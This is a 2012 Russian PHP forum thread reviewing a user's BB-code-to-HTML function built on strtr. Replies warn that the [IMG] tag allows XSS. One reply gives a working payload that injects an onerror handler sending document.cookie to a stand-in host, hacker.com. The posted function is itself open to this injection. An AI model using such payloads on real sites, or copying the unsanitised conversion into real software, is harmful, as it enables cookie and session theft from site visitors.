Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Скриптовые языки программирования > PHP
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 11.03.2012, 06:45   #1
Кольша
Далеко не
Участник клуба
 
Аватар для Кольша
 
Регистрация: 11.08.2011
Сообщений: 1,512
По умолчанию Оцените/дополните "систему" BB кодов

Всем привет!!!!Написал тут для сайт систему так называемых BB кодов прошу оценить дополнить вот код:
PHP код:
function bbtohtml($bb
{
    
$tr = array(
        
"\n"=>"<br>",
        
"<"=>"&lt;",">"=>"&gt;",
        
"&"=>"&amp;",
        
"[Delphi]"=>'<pre class="brush: delphi;">',"[/Delphi]"=>"</pre>",
        
"[ Php ]"=>'<pre class="brush: php;">',"[/ Php ]"=>"</pre>",
        
"[Css]"=>'<pre class="brush: css;">',"[/Css]"=>"</pre>",
        
"[JS]"=>'<pre class="brush: js;">',"[/JS]"=>"</pre>",
        
"[Sql]"=>'<pre class="brush: sql;">',"[/Sql]"=>"</pre>",
        
"[B]"=>"<b>","[/B]"=>"</b>",
        
"[I]"=>"<i>","[/I]"=>"</i>",
        
"[U]"=>"<u>","[/U]"=>"</u>",
        
"[IMG]"=>'<img  src="',"[/IMG]"=>'" alt="">',
////smiles
        
"[Amazing]"=>'<img  src="/files/smiles/amazing.png">',
        
"[Anger]"=>'<img  src="/files/smiles/anger.png">',
        
"[Badegg]"=>'<img  src="/files/smiles/badegg.png">',
        
"[Badsmile]"=>'<img  src="/files/smiles/badsmile.png">',
        
"[Beaten]"=>'<img  src="/files/smiles/beaten.png">',
        
"[Bigsmile]"=>'<img  src="/files/smiles/bigsmile.png">',
        
"[Cry]"=>'<img  src="/files/smiles/cry.png">',
        
"[Electricshock]"=>'<img  src="/files/smiles/electricshock.png">',
        
"[Exciting]"=>'<img  src="/files/smiles/exciting.png">',
        
"[Eyesdroped]"=>'<img  src="/files/smiles/eyesdroped.png">',
        
"[Greedy]"=>'<img  src="/files/smiles/greedy.png">',
        
"[Grimace]"=>'<img  src="/files/smiles/grimace.png">',
        
"[Haha]"=>'<img  src="/files/smiles/haha.png">',
        
"[Happy]"=>'<img  src="/files/smiles/happy.png">',
        
"[Horror]"=>'<img  src="/files/smiles/horror.png">',
        
"[Money]"=>'<img  src="/files/smiles/money.png">',
        
"[Scorn]"=>'<img  src="/files/smiles/"scorn.png>',
        
"[Secretsmile]"=>'<img  src="/files/smiles/secretsmile.png">',
        
"[Shocked]"=>'<img  src="/files/smiles/shocked.png">',
        
"[Theironman]"=>'<img  src="/files/smiles/theironman.png">',
        
"[Unhappy]"=>'<img  src="/files/smiles/unhappy.png">',
        
"[What]"=>'<img  src="/files/smiles/what.png">'
///smiles
     
);
    return 
strtr($bb,$tr);

Прошу протестить!!

Последний раз редактировалось Кольша; 11.03.2012 в 06:54.
Кольша вне форума Ответить с цитированием
Старый 11.03.2012, 07:56   #2
ADSoft
Старожил
 
Регистрация: 25.02.2007
Сообщений: 4,160
По умолчанию

оно нам надо? Сами не пробовали тестировать?
ADSoft на форуме Ответить с цитированием
Старый 11.03.2012, 09:59   #3
Wicort
Форумчанин
 
Аватар для Wicort
 
Регистрация: 04.08.2009
Сообщений: 684
По умолчанию

тег img закрывать не забывайте
Код HTML:
<img ... />
Еслия Вам помог, не поленитесь нажать на весы и оставить отзыв. Это не займет много времени, но даст понять, что я старался не зря =)
Мой ник зарегистрирован, а твой?
Wicort вне форума Ответить с цитированием
Старый 11.03.2012, 11:40   #4
Cronos20
Форумчанин
 
Регистрация: 08.07.2010
Сообщений: 679
По умолчанию

Никакой защиты от xss в теге <img/>, рискуете получить кучу сюрпризов
Cronos20 вне форума Ответить с цитированием
Старый 11.03.2012, 11:42   #5
Кольша
Далеко не
Участник клуба
 
Аватар для Кольша
 
Регистрация: 11.08.2011
Сообщений: 1,512
По умолчанию

опишите как защититься??
Кольша вне форума Ответить с цитированием
Старый 11.03.2012, 13:30   #6
Cronos20
Форумчанин
 
Регистрация: 08.07.2010
Сообщений: 679
По умолчанию

Регулярным выражением проверять, чтобы src всегда был валидной картинкой, т.е. файлом с расширением .jpg, .png
Чтобы вместо файла не подсунули что-то типа http://hacker.com/image.php?cookie=document.cookie в разных вариациях
Cronos20 вне форума Ответить с цитированием
Старый 11.03.2012, 13:37   #7
Кольша
Далеко не
Участник клуба
 
Аватар для Кольша
 
Регистрация: 11.08.2011
Сообщений: 1,512
По умолчанию

Спасибо,я уж почитал в википедии,правильно ли я мышлю:
1)копируем текст с позиции src" по позицию " ;
2)копирем текст до первой точки с конца или последние три буквы
проверям If ($ext!='jpg' || $ext!='bmp' || $ext!='png' || $ext!='gif'){}

Последний раз редактировалось Кольша; 11.03.2012 в 13:39.
Кольша вне форума Ответить с цитированием
Старый 11.03.2012, 14:18   #8
Cronos20
Форумчанин
 
Регистрация: 08.07.2010
Сообщений: 679
По умолчанию

Я ж вам говорю, регулярное выражение нормальное надо
Вот инфа к размышлению :
Код:
[img]unknown.png" onerror="img=new Image(); img.src = 'http://hacker.com/image.php?cookie=' + document.cookie + '&fake=fake.gif[/img]
И ваш фильтр пал)))
Cronos20 вне форума Ответить с цитированием
Старый 14.03.2012, 14:58   #9
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию

Привет ! Я думаю тут не тяжело будет , адрес всегда стандартный . <img src="/files/smiles/what.png"> .. меняется только последнее слово .
Как сказал Cronos20 хорошая регулярка и ни кто не проскочит )))

Cronos20 Спасибо за дельный совет .
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как можно создать поисковую систему на подобии "GOOGLE"? HTML, CSS Antoha93 HTML и CSS 3 22.01.2014 00:53
Вывести название соответствующей карты вида "шестерка бубен", "дама червей","туз треф" и т.п. воваава Помощь студентам 3 01.12.2011 12:50
при вводе на листе "магазин"- код товара появлялось "описание" товара из "склада" с "продажной ценой" aleksei78 Microsoft Office Excel 13 25.08.2009 12:04
Создаю "тестирующую систему" для проверки задач. Программисты, нужна ваша помощь! alexfmf Помощь студентам 12 30.04.2009 20:19